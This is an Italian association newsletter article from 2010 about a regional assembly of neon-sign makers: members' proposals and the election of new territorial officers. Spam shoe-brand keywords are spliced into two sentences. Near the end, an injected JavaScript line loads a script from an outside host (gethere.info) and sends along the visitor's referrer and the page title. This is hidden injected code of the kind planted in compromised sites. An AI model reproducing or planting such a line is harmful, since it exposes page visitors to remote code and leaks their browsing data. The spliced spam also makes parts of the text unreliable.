AIFIL Area 4. Rinnovo delle cariche. L’assemblea territoriale lancia idee per il futuro.

di Redazione AIFIL[IN]FORMA - 19 novembre 2010
Classificato in: Mondo AIFIL, Segreterie territoriali, Vita AIFIL | Tag: ,

Venerdì 19 novembre si è tenuta a Castel S.Pietro Terme (BO) l’Assemblea Territoriale Area 4 che raggruppa le regioni Emilia Romagna, Toscana e Marche. All’ordine del giorno, il rinnovo delle cariche Territoriali e le proposte dei soci per migliorare i rapporti con la Presidenza Nazionale AIFIL.

L’incontro per il rinnovo delle cariche Territoriali è iniziato, come di regola, con l’elezione del Presidente di Assemblea e la verifica del quorum, per poi proseguire con un saluto introduttivo del Segretario Nazionale Vivian Collura, in rappresentanza del Presidente Nazionale Sergio Arioli che non ha potuto presenziare.

Vivian Collura ha informato i presenti sulle attività della Presidenza, ponendo particolare accento sull’imminente pubblicazione della nuova rivista online AIFIL[IN]FORMA, che sarà uno strumento importantissimo per la diffusione di notizie e aggiornamenti sul mondo AIFIL. Vivian Collura ha poi raccolto con entusiasmo alcuni interessanti suggerimenti per migliorare i rapporti tra i soci e la Presidenza.

In particolare:

“Far sentire” la presenza di AIFIL nei confronti degli Associati.

Secondo l’Area 4, è necessario che la Segreteria contatti telefonicamente almeno 12 soci alla settimana – magari proprio quelli nuovi – per interessarsi alla situazione lavorativa degli Associati e farsi carico di eventuali segnalazioni a livello locale.

Stilare un codice deontologico per regolamentare i rapporti tra i soci.

Secondo gli Associati è indispensabile avere delle regole di base per poter distinguere i Soci che operano in maniera corretta da quelli che non lo fanno, roshe run nm br e agire di conseguenza a livello nazionale, per mantenere il buon nome dell’Associazione.

Creare un network per promuovere la collaborazione.

Si lamenta l’assenza di un listino prezzi di riferimento, condiviso tra i soci a livello nazionale, che favorisca lo scambio di lavoro tra colleghi. Una sorta di “convenzione” fra gli Associati AIFIL che stimoli la nascita di nuove collaborazioni.

Istituire il marchio di qualità AIFIL.

L’Area 4 sente l’esigenza di creare una sorta di “bollino di qualità” che AIFIL dovrebbe verificare annualmente per garantire la qualità tecnica, ma anche la correttezza amministrativa, contributiva e la leltà nei confronti degli altri Associati.

Promuovere la comunicazione esterna

I Soci sentono la necessità di migliorare la conoscenza del marchio AIFIL, al fine di instaurare – ad esempio – nuovi rapporti con Confcommercio e Confartigianato e promuovere azioni concrete che facciano crescere una sorta di “cultura aziendale” nel campo delle insegne luminose.

Elenco dei Soci in forma cartacea

I soci hanno l’esigenza di veder pubblicato il loro nome – con il nome azienda, città, sito internet o indirizzo mail per chi non ne ha uno –  anche in allegato alla nuova rivista NEON.

Studio di fattibilità convenzioni credito

I soci dell’area ritengono necessario uno studio di fattibilità nello stipulare una convenzione con una società che assicuri il credito, ma che non sia una società di recupero crediti.

Contributo per la rottamazione

Il Consigliere Territoriale Antonio Fidanzi si sta informando circa un’iniziativa molto interessante per i Soci: il contributo per la rottamazione delle insegne, già esistente in Lombardia. In tal senso si chiede a Vivian Collura di richiedere il supporto dell’avvocato Laruffa per promuovere questa normativa anche a livello nazionale.

Convenzione pratiche

Gli Associati vorrebbero valutare una convenzione con uno studio che si occupi di pratiche a livello nazionale, che possa collaborare con l’avvocato Laruffa, che conosce già bene la materia.

Dopo queste interessanti proposte, si è poi passati al saluto del Segretario Territoriale uscente Fabrizio Galeotti e alla nomina del nuovo Consiglio. Antonio Fidanzi, roshe run suede della ditta Neon Luigi Inghilleri, ha presentato la propria candidatura, comunicando ai presenti il proprio programma e confermandosi disponibile a partecipare alle riunioni del Consiglio Nazionale.

L’Assemblea è terminata, infine, come da convocazione, con la votazione dei nuovi componenti del Consiglio Territoriale, scelti dai soci all’unanimità.

Ecco le nuove cariche:

- Segretario Territoriale: Antonio Fidanzi (Neon Luigi Inghilleri di Livorno)

- Vicesegretario Territoriale: Gianluca Brandoli (Pubblieuropa di Carpi – MO)

- Consigliere Territoriale: Francesco Papini (La Fluorescente di Calci – PI)

- Consigliere Territoriale: Marco Palandra (M.P. di Castel Guelfo di Bologna  – BO)

La redazione di AIFIL[IN]FORMA si complimenta per le nuove nomine del Consiglio Territoriale di Area 4 e comunica che sarà al più presto online un’intervista al nuovo segretario Territoriale Antonio Fidanzi.

State sintonizzati!

da sinistra in alto: Antonio Fidanzi, Fabrizio Galeotti, Cristian De Marco, Marco Palandra, da sinistra sotto: Ivreo Dall

Tre componenti del nuovo Consiglio Territoriale. Da sin. il Consigliere Territoriale Marco Palandra, il Segretario Territoriale Antonio Fidanzi e il Vicesegretario Territoriale Gian Luca Brandoli

s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed